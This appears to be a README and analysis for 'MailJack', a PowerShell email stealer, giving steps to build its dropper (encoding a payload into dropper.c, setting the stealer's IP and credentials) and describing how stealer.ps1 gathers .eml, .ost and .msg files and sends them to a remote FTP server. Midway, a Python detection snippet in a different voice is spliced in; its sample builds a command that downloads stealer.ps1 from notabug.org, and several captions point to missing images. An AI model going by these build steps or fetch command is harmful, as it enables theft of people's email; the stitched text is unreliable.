1d8 / MailJack


MailJack

MADE FOR EDUCATIONAL/RESEARCH PURPOSES


Explaining The Files

The test.ps1 file should include a link to the stealer.ps1 file. Then run b64encode.ps1 and place its output inside the b642 variable in dropper.c. Make sure to prepend powershell -encodedCommand to the base64 encoded data in the b642 variable so that the base64 is decoded and executed.

Make sure to change the IP address, username and password used in stealer.ps1 to suit your own needs.

Post Execution

After execution of dropper.exe, we find that the infamous "hello world" phrase pops up in the command line & we see 2 new powershell scripts loaded onto the Desktop: file.ps1 & stealer.ps1:

Our process tree:

So after execution of the dropper, Powershell is executed 4 times along with cmd.exe being executed 5 times.

We also see ping.exe being used twice, which serves to make the program sleep for a few seconds: here for about 10 and 5 seconds, since it asks for localhost to be pinged 10 and 5 times and each ping takes about a second, maybe even less:

The first instance of powershell is simply used to print "hello world":

The second instance of powershell is used to execute file.ps1:

Inside file.ps1 is just random hex, and the same goes for stealer.ps1; the two files are likely modified after being executed:

Viewing the command in the Process Tree for file.ps1, we get a command that is base64 encoded twice. The 1st line is the double base64 encoded command while the 4th line is only base64 encoded once:

Powershell.exe -ExecutionPolicy bypass is used to override the execution policy for Powershell scripts, which allows an attacker to execute their own scripts.

And the -encodedCommand flag simply decodes the base64 and executes it.

Decoding the 2nd base64, we see that file.ps1 retrieves the stealer.ps1 file:

Setting ProgressPreference to SilentlyContinue simply suppresses the output from the web request; web requests in Powershell usually show a loading bar that indicates progress, for example:
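The nested -encodedCommand layers described above are something a defender can unpack automatically from process command-line telemetry. The following is an added detection example, not code from the MailJack repository: it peels each base64/UTF-16LE layer (the encoding -encodedCommand expects), counts the depth, and looks for the markers found in this analysis (-ExecutionPolicy bypass, ProgressPreference, notabug.org). The sample command line is constructed here with a placeholder URL path.

```python
import base64
import re

# -EncodedCommand and its short forms, followed by a base64 argument.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Strings the analysis found in the decoded layers; matched case-insensitively.
INDICATORS = ("-ExecutionPolicy bypass", "ProgressPreference", "notabug.org")


def ps_encode(script):
    """Encode text the way -encodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_layers(cmdline, max_depth=5):
    """Peel nested -encodedCommand arguments, returning each decoded layer
    outermost first. Stops at the first layer that is not valid base64/UTF-16LE."""
    layers, current = [], cmdline
    for _ in range(max_depth):
        match = ENC_RE.search(current)
        if not match:
            break
        try:
            current = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            break
        layers.append(current)
    return layers


def assess(cmdline):
    """Return encoding depth, matched indicators and whether the line warrants review."""
    layers = decode_layers(cmdline)
    text = "\n".join([cmdline] + layers).lower()
    hits = [i for i in INDICATORS if i.lower() in text]
    return {
        "depth": len(layers),
        "indicators": hits,
        "innermost": layers[-1] if layers else cmdline,
        "suspicious": len(layers) >= 2 or bool(hits),
    }


# Constructed sample mirroring the file.ps1 command line described above
# (placeholder URL path; not taken from the repository).
INNER_SCRIPT = ("$ProgressPreference = 'SilentlyContinue'; "
                "Invoke-WebRequest 'https://notabug.org/PLACEHOLDER/stealer.ps1'")
SAMPLE_CMDLINE = ("powershell.exe -ExecutionPolicy bypass -encodedCommand "
                  + ps_encode("powershell -encodedCommand " + ps_encode(INNER_SCRIPT)))
```

Run assess() over the command-line field of process-creation events; a depth of 2 or more is rare in legitimate automation and is the strongest single signal here.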

For those who are unaware, notabug.org is a lot like Github, it allows you to host code and here, it hosts the primary malware:

The first five lines of code:

  1. Sets a user variable to the current user's username
  2. Sets a dir variable to the user's temp directory + the user's username (%TMP%\Username)
  3. Creates a directory using the dir variable & suppresses the output (the directory would be %TMP%\Username)
  4. Searches recursively for files with the .eml, .ost, .oft, or .msg extension and adds each matching file to the folder created in line 3
  5. Creates a zip file of the folder created in line 3, which should now contain files with common email extensions

Lines 6-17 simply send the zip file to a remote FTP server.

Lines 18-19 remove the zip file as well as the folder created in the user's %TMP% directory.

Now back to Process Tree since we have one remaining powershell.exe instance to look over:

All this last instance of powershell does is finally execute stealer.ps1.

Summary

  1. Dropper.exe will drop file.ps1
  2. File.ps1 includes a double base64 encoded command which will grab stealer.ps1
  3. Stealer.ps1 will steal files with common email extensions & send them to a remote FTP server
